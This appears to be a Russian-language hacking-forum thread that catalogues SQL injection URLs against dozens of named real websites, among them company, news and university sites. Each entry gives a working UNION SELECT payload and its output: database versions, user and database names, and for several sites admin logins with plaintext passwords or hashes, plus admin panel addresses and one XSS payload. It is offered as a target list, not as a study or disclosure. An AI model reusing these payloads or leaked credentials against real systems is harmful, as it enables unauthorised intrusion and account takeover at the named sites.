www.softstandart.com, тИЦ = 10 Code: http://www.softstandart.com/feedback.php?id=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0 http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+0 вторая инъекция - вывод всех записей version() - 5.0.67-log database() - softstandart user() - [email protected] здесь вероятно логин и хэш админа: Code: http://www.softstandart.com/?ks_cat=9999%27+union+select+1,2,3,4,concat(id,':',login,':',pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+user--+0 интуиция говорит мне что он быстро подбирается и подходит к админке: http://www.softstandart.com/admin ----------------------------- www.bfpais.ru, тИЦ = 10 Code: http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,concat(version(),0x3A,user(),0x3A,database()),5,6,7,8,9-- version() - 5.0.67 user() - bfpais@localhost database() - bfpais Code: http://www.bfpais.ru/index.php3?id=6191&nid=-1+union+select+1,2,3,4,5,6,concat(id,0x3A,nick,0x3A,passwd,0x3A,access),8,9+from+_user+limit+0,1-- как мне кажется, есть большая вероятность что здесь пароль вообще даже не хэширован и подходит к админке: http://www.bfpais.ru/admin ----------------------------- www.infoliolib.info, тИЦ = 160 Code: http://www.infoliolib.info/author.php?aid=-1+union+select+1,concat(version(),0x3A,user(),0x3A,database()),3-- version() - 5.0.51a-community user() - infoli_user@localhost database() - infoli_infolio ----------------------------- www.studentam.by Code: http://www.studentam.by/index.php?m=6&cl=l&mn=1&id=-1+union+select+version(),database(),user()-- version() - 5.0.51a-6-log database() - studentamby user() - studentamby@localhost
Веб дизайн студия http://www.archont.info/ PR=4 Code: http://www.archont.info/albom.php?event=showimg&id_pic=-2+union+select+1,database() ,3,4,5,6,7,8,user(),10,11,12-- version() - 4.1.22-standard user() - artper_newsite@localhost database() - artper_newsite
http://www.old-pr o.ru/catalog_item.php?id=-44+union+select+version()--&cat= 5.0.67-log http://www.lev elpro68.ru/index.php?id=-31+union+select+1,2,3,unhex(hex(concat_ws(0x3a,login,0x3a,password))),5,6,7,8+from+users--&PHPSESSID=769d439282f763586a8f8e25dddc402a http://www.vis aro.ru/index.php?id=-31+union+select+1,2,3,4,5,unhex(hex(login)),7,8+from+users--&PHPSESSID=3ad8b5826f2f814541516c5f4a1af0e1 http://sanve k.ru/index.php?id=-45+union+select+1,2,3,4,concat_ws(0x3a,name,0x3a,login,0x3a,password),6,7,8+from+wm_users--&type=C Administrator:::admin:::2 http://deve lop.renet.ru/catsection.php?id=-19+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 4.1.22-log
http://www.kawacolor.com.ar/detalle_tienda.php?id=-1+union+select+1,2,concat_ws(0x3a3a,email,pass,nivelPermiso),4,5,6,7,8+from+usuarios+limit+0,1/* login:[email protected] pass:admin http://www.kawacolor.com.ar/admin Аргентина плиять.. =)
http://www.old-pro.ru/news.php?id=-3+UNION+SELECT+pass,login,rand_id+from+u47894_emaika.shop_admin+limit+0,1-- version: 5.0.67-log login: 131973 pass: eeemaika http://www.old-pro.ru/news.php?id=-3+UNION+SELECT+login,pass,mail+from+u47894.settings+limit+0,1-- login: admin pass: abidqlyv В админку http://www.old-pro.ru/admin/ почему-то не заходит...
PR=7 тИЦ=1300 http://www.popmech.ru/ Code: http://www.popmech.ru/part/?articleid=-1+union+select+user()-- version() - 4.0.26 user() - [email protected]
http://abiturient.ed u.uz/index.php?o=info&op=tush&id=-153+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14-- 5.1.15-beta-log http://www.castin g.uz/anketa.php?id=-169+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48-- 4.1.14-standard http://www.pharm a.uz/poleznoe.php?id=-1+union+select+1,concat(user,0x3a,pass),3,4,5+from+userlist-- version 5 http://music.bishke k.kg/cgi-bin/mzinfo.cgi?id=-604+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14-- 4.1.19-log http://www.summersch ool.manas.kg/index.php?id=-31+union+select+1,2,unhex(hex(version())),4-- 4.1.10 http://www.jo blist.tj/showvacancy.php?id=-1257+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- 4.1.22-standard-log
http://www.trianglearts.org/batiscafo/proceso.php?id=-19+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,user(),14/* Database Version:4.0.20a-nt User name:batiscafo@localhost Database name: trianglearts_batiscafo http://www.wopl.org/tips-detail.php?id=-3+union+select+1,2,version()/* Database Version: 5.0.45 Database name: wopl User name: remote@localhost http://www.telespeak.co.uk/course-detail.php?id=-3+union+select+1,version(),user(),4,5-- version() 5.0.51a-log user() [email protected] database() db250573002 http://www.fatsalesman.com/detail.php?propertyid=3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--&listingtype=boat Database Version: 5.0.15-nt Database name: fat User name: ot@serv http://ukbusinessbroadband.co.uk/detail.php?name=pipex_PRO&id=3+union+select+1,version(),user(),4,5,6,7,8,9,10,11,database(),13,14,15,16,17,18,19,20,21,22,23/* Database Version:4.1.22-standard User name ipquant_pipquan@localhost Database nameipquant_pipex http://klinika.vetdoctor.ru/right_column.detail.php?id=-3+union+select+version(),2/* Database Version:5.0.22 Database name:u00088_klinika User name :u00088_klinika'@'localhost
http://www.atlantisstorm.com/popupproduct.php?ID=-3+union+select+1,2,version(),4,5-- 5.0.67-community
http://honors.uoregon.edu/faculty/profiles/index.php?id=5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,table_name,18+from+INFORMATION_SCHEMA.TABLES--
Code: http://football.vtsnet.ru/view_article.php?id=-2+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4/* db_football@localhost:db_football:4.0.18-log XSS: Code: http://football.vtsnet.ru/search_request.php Вводим в поле поиска : Code: "><script>alert(/xss/)</script><" Code: http://football.vtsnet.ru/statistics/players_personal.php?season=current&league=3&id=-1+union+select+1,2,user(),4,5,6,7,8,9/* p.s вобщем в двиге очень много скулей=)еще там стоит форум PHPBB , версию неполучилось определитЬ,и прочесть данные из таблы phpbb_users...наверно туплю гдето....=/// PR: 4 ТИЦ: 90
http://en.apa.az/news.php?id=-86587+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- version 5
http://www.grid.iu.edu/news/news.php?id=9999+union+select+1,2,3,4,version(),6,7,8-- rssuser@nukufetau-b 4.1.20-log
Version: 4.1.20 User: malankara_root@localhost Dbname: malankara_data members found in DB news found in DB админка по адресу admin
Code: http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=1/**/union/**/select/**/1,2,version(),4,5,6/* Версия MySQL: 5.0.22 ------- Имя базы: rozymnuk_comua ------- Юзер: rozymnuk_comua@localhost ------- @@version_compile_os: unknown-freebsd6.0 ------- Таблицы: catalog categories chapters clipart clipart_group orders orders_goods orders_old pweek recalls ri_categories
Пашкела. Исправляю... http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=1/**/union/**/select/**/1,2,version(),4,5,6/* Таблицы: catalog categories chapters clipart clipart_group orders orders_goods orders_old pweek recalls ri_categories ri_prices saytnews subscribe users pwd email nick voitbase
Звукозаписывающий лейбл Code: http://www.cd-maximum.ru/index.php?lang=ru&hid=999+union+select+1,concat(id,0x3a,name,0x3a,usr,0x3a,passwd)+from+users+limit+0,1/* Version: 4.0.27 Database: cdmax User: [email protected]
http://shkola.lv/index.php?mode=lesson&lsnid=-1+union+select+1,2,3,4,5/* DATABASE: shkola VERSION: 4.1.21 USER: shkola@localhost
http://www.gsd.umn.edu/article.php?id=9999+union+select+database(),version(),3,4,5,6,7,8,9,10,11,12,user(),14,15,16-- gsd_main_db 4.1.22-log [email protected] UPD http://www.assumption.edu/admin/hotnews/story.php?id=99999+union+select+1,username,3,passw ord,5,6,7,8+from+users-- msun:95c90aa47733b9023c318d9914606339 UPD+ http://www.asuci.uci.edu/news/story.php?id=999999+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17-- 5.0.67-community-nt
